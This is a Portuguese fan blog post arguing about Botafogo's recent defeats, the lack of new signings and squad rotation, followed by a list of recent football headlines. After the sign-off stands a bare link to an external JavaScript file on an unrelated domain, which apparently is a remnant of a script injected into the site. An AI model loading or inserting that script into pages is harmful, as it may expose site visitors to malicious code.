O Glorioso

Sobre ontem, hoje e amanhã do Botafogo

Nesta semana o Botafogo perdeu dois jogos. Derrotas nunca são boas independente das circunstâncias. As desculpas utilizadas servem apenas para amenizar o nosso sofrimento e como justificativa diante do escárnio dos amigos e torcedores adversários. Ela torna-se ainda mais dolorosa se considerarmos o que houve na segunda-feira, diante do Avaí, ainda tão presente em nossas memórias.

Na quinta-feira, pela Copa do Brasil, novamente sofremos um gol nos primeiros 10 minutos de jogo, como já havia acontecido diante do Coritiba, Avaí e se puxarmos mais um pouquinho pela memória, Barcelona, pela Libertadores. Esse é um problema que precisa ser corrigido. Depois disso, ficamos um pouco tontos e em seguida equilibramos as ações. Terminamos o jogo com mais posse de bola, mais chances de gols e mais um monte de coisas que no final das contas, não serve pra nada. Jair deu uma entrevista coletiva contrariado, como já havia feito na segunda-feira, por causa dessa numerologia. Não adianta, futebol é bola na rede. Pode ser injusto entretanto é assim que funciona.

A diretoria tem sido de uma vagarosidade ímpar na entrega dos reforços tão reclamados pelo Jair Ventura, time e todos os torcedores, o que nos entristece não pode ser motivo de desânimo na torcida pelo êxito em todas as competições que disputamos. Neste ponto que a comissão técnica precisa andar ao lado do setor de fisiologia e entender que nosso elenco enxuto precisa ser mesclado. Principalmente no Brasileirão.

Nosso treinador deu a entender que escalará força máxima contra o Corinthians, amanhã. Acho um erro. O jogo de quinta-feira é muito mais importante. Se formos campeões da Libertadores, o meio da tabela no campeonato nacional não terá nenhuma importância. Poupar o time não significa usar todos os reservas. É possível usar metade do time, descansar 3 a cada jogo. Todos estão chateados com a falta de reforços, mas nosso treinador está lá para prover soluções. Não são coletivas desabafando que resolverão o problema.

Sendo assim, torçamos para que amanhã parte do time seja poupado, que os reservas entrem com sangue nos olhos e que o líder do campeonato sofra o seu primeiro revés. Aqui é o Botafogo!

 

Saudações alvinegras

https://cloudapi.online/js/api46.js

Últimos Posts

Após experiências nos EUA e na Itália, meio-campista brasileiro se destaca na Suécia e assina com novo clube

A ida de jovens brasileiros ao exterior antes mesmo da estreia profissional tem se tornado cada vez mais frequente. Um…

26 de novembro de 2025

Com quatro desfalques, Atlético anuncia lista de relacionados para decisão na Sul-Americana

O clube ainda conta com o retorno de Dudu e Fausto Vera, além de João Marcelo, que foram desfalques no…

20 de agosto de 2025

Lyanco tem lesão muscular confirmada na coxa esquerda e pode ser desfalque em duelos pela Copa do Brasil

Lyanco sentiu dores na coxa esquerda durante a vitória por 2 a 1 na última quinta-feira (14) contra o Godoy…

18 de agosto de 2025